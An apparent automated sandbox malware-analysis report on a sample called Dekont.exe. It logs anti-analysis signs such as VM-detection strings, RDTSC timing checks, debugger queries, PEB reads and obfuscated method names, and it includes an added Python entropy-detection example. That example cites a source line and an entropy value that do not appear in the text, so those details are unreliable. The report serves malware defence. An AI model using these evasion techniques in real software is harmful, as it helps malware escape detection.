          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, e5nxOdzlIYqo79mMuV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VrYeP8GLLf', 'JWBeS9rm0R', 'VCReDPD0Qq', 'Hmme8IlYWC', 'qJleZTWKsj', 'xOueew4kYS', 'vPseK3fTt9'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, kwJxqdN3GExdyc1bPB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YxXwgLKhOk', 'Q5CwsZw8Fv', 'kGswzPU1BP', 'JGq2ij5Xvf', 'dxh2c7Jhkd', 'YWt2wOZJxq', 'tlp22JH6MQ', 'Ptpgh616eHHrjVSnlE5'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, hP0qnVoCrnGXfRDPQpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CruKv4dcEc', 'PQ9KmWffmv', 'fwYK7oF8W7', 'gqjKLbR4dB', 'acVKB1Wnpk', 'iQsKTECdhF', 'VCAKM53rga'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, LCBpR6tWKBHvi4TDRT.csHigh entropy of concatenated method names: 'H4pXjdBst0', 'pawX0TDqL6', 'zreXJN8Fmq', 'CsQXoV2Z0j', 'ofdXSG2FAZ', 'C4rXDsEs1C', 'XubX89bhYu', 'ltVXZ9g5m2', 'IZTXeAaRo5', 'rInXKgKpIs'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, Sy7nxMaCWn0aUQoKQl.csHigh entropy of concatenated method names: 'HQL4GKGI0I', 'Htp4herFmm', 'EQo4Q10Xh3', 'su14Oq4xeA', 'Cnv4dCLZQA', 'RRxQBwl9Lp', 'AcTQTNc8kQ', 'n48QMR4o6O', 'uRKQxALOl0', 'jW4Qg0P5ry'
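Two indicators in this group rest on the same measurement: the .text section entropy of 7.817 bits per byte (close to the 8.0 maximum, as packed or encrypted code looks) and the "high entropy of concatenated method names" flagged on the unpacked .NET types (generated identifiers rather than words). The following is an added example, not Joe Sandbox code, that computes both. It parses only the PE header fields needed for per-section entropy, builds a deliberately minimal synthetic image for offline use (zero-length optional header, which no loader would accept), and applies the names copied from the kD0JNdgNBriBGn5egS.cs line above. The two thresholds, the ORDINARY_NAMES comparison set and all function names are assumptions of this example, not Joe Sandbox's.

```python
"""Shannon-entropy heuristics behind two indicators in this report.

Added example, not Joe Sandbox code. section_entropies() reads the section
table of a PE image; build_test_pe() makes a synthetic image so the example
runs offline. Thresholds are assumptions for illustration.
"""
import math
from collections import Counter
from typing import Dict, List, Sequence, Tuple

PACKED_SECTION_THRESHOLD = 7.2      # assumption; ordinary x86 code usually sits near 6.0-6.8
OBFUSCATED_NAMES_THRESHOLD = 4.8    # assumption; word-based CamelCase names land near 4.0-4.5


def shannon_entropy(data) -> float:
    """Bits per symbol over a bytes or str value: 0.0 if constant, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_entropies(pe: bytes) -> Dict[str, float]:
    """Entropy of each section's raw data, keyed by section name."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = int.from_bytes(pe[0x3C:0x40], "little")
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = int.from_bytes(pe[coff + 2:coff + 4], "little")
    opt_size = int.from_bytes(pe[coff + 16:coff + 18], "little")
    table = coff + 20 + opt_size                 # section table follows the optional header
    result = {}
    for k in range(nsections):
        entry = table + 40 * k                   # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size = int.from_bytes(pe[entry + 16:entry + 20], "little")
        raw_ptr = int.from_bytes(pe[entry + 20:entry + 24], "little")
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result


def section_looks_packed(entropy: float) -> bool:
    return entropy >= PACKED_SECTION_THRESHOLD


def method_name_entropy(names: Sequence[str]) -> float:
    """Entropy of the concatenated names, the quantity the report's indicator is based on."""
    return shannon_entropy("".join(names))


def names_look_obfuscated(names: Sequence[str]) -> bool:
    return method_name_entropy(names) >= OBFUSCATED_NAMES_THRESHOLD


def build_test_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Synthetic PE: DOS stub, COFF header, empty optional header, then the given sections."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + e_lfanew.to_bytes(4, "little")
    coff = (b"PE\0\0" + (0x14C).to_bytes(2, "little")              # IMAGE_FILE_MACHINE_I386
            + len(sections).to_bytes(2, "little") + b"\0" * 12
            + (0).to_bytes(2, "little") + b"\0" * 2)               # SizeOfOptionalHeader = 0
    raw_ptr = e_lfanew + 24 + 40 * len(sections)
    entries, body = b"", b""
    for name, blob in sections:
        entries += (name.encode("ascii").ljust(8, b"\0")
                    + len(blob).to_bytes(4, "little") + (0).to_bytes(4, "little")
                    + len(blob).to_bytes(4, "little") + raw_ptr.to_bytes(4, "little")
                    + b"\0" * 16)
        body += blob
        raw_ptr += len(blob)
    return dos + coff + entries + body


# Method names exactly as listed for kD0JNdgNBriBGn5egS.cs in this report.
REPORT_NAMES = ['ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ',
                'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW',
                'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u']
# Constructed comparison set of ordinary .NET method names.
ORDINARY_NAMES = ["ToString", "Dispose", "GetHashCode", "Equals"]

if __name__ == "__main__":
    image = build_test_pe([(".text", bytes(range(256)) * 4), (".rdata", b"\0" * 512)])
    for sec, ent in section_entropies(image).items():
        print(f"{sec:8} entropy={ent:.3f} packed={section_looks_packed(ent)}")
    print("report names:", round(method_name_entropy(REPORT_NAMES), 3), names_look_obfuscated(REPORT_NAMES))
    print("ordinary names:", round(method_name_entropy(ORDINARY_NAMES), 3), names_look_obfuscated(ORDINARY_NAMES))
```

Raw entropy is a coarse signal on short inputs: a class with only a handful of word-based methods can still score fairly high, and a packer that pads with zeros can pull a section's value down, so use these numbers to prioritise which unpacked module or section to look at first rather than as a verdict.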

          Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Dekont.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: Yara match	File source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\Dekont.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\Dekont.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dekont.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 2B39904 second address: 2B3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 2B39B7E second address: 2B39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: 2670000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: 2920000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: 98A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: A8A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: AAE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Memory allocated: BAE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\Dekont.exe	Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5775
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3877
          Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7528
          Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2416
          Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874
          Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872
          Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 9823
          Source: C:\Windows\explorer.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Dekont.exe	API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exe	API coverage: 2.0 %
          Source: C:\Users\user\Desktop\Dekont.exe TID: 6348	Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7128	Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3660	Thread sleep count: 7528 > 30
          Source: C:\Windows\explorer.exe TID: 3660	Thread sleep time: -15056000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3660	Thread sleep count: 2416 > 30
          Source: C:\Windows\explorer.exe TID: 3660	Thread sleep time: -4832000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1816	Thread sleep count: 149 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 1816	Thread sleep time: -298000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1816	Thread sleep count: 9823 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 1816	Thread sleep time: -19646000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000006.00000003.3097004039.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
          Source: explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-
          Source: explorer.exe, 00000006.00000003.3850951608.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Dekont.exe	Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0040ACF0 LdrLoadDll
          Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_008769F5 IsDebuggerPresent
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107E10E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107E10E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCC0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD80E9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01090115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107A118 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107A118 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01000124 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01064144 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01064144 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01068158 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD208A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0108C188 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01010185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01074180 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FFC073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0105019F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD2050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010961C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0104E1D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0104E1D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCA020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCC020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FEE016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010A61E5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010001F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01054000 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01072000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01066030 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01056050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCA197 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD6154 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCC156 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010680A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010960B8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010960B8 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010520DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010560E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010120F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0100A30B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FE02E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FDA2C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01052349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01078350 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0105035C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0105035C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0109A352 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FE02A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107437C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FC826B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD4260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD6259 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCA250 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0108C3CD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010563C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FC823B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010743D4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107E3DB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_0107E3DB mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_010063FF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FEE3F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FE03E9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FD83C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FDA3C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01058243 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_01058243 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FC8397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FF438F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exe	Code function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]5_2_00FCE388
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCE388 mov eax, dword ptr fs:[00000030h]5_2_00FCE388
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080274 mov eax, dword ptr fs:[00000030h]5_2_01080274
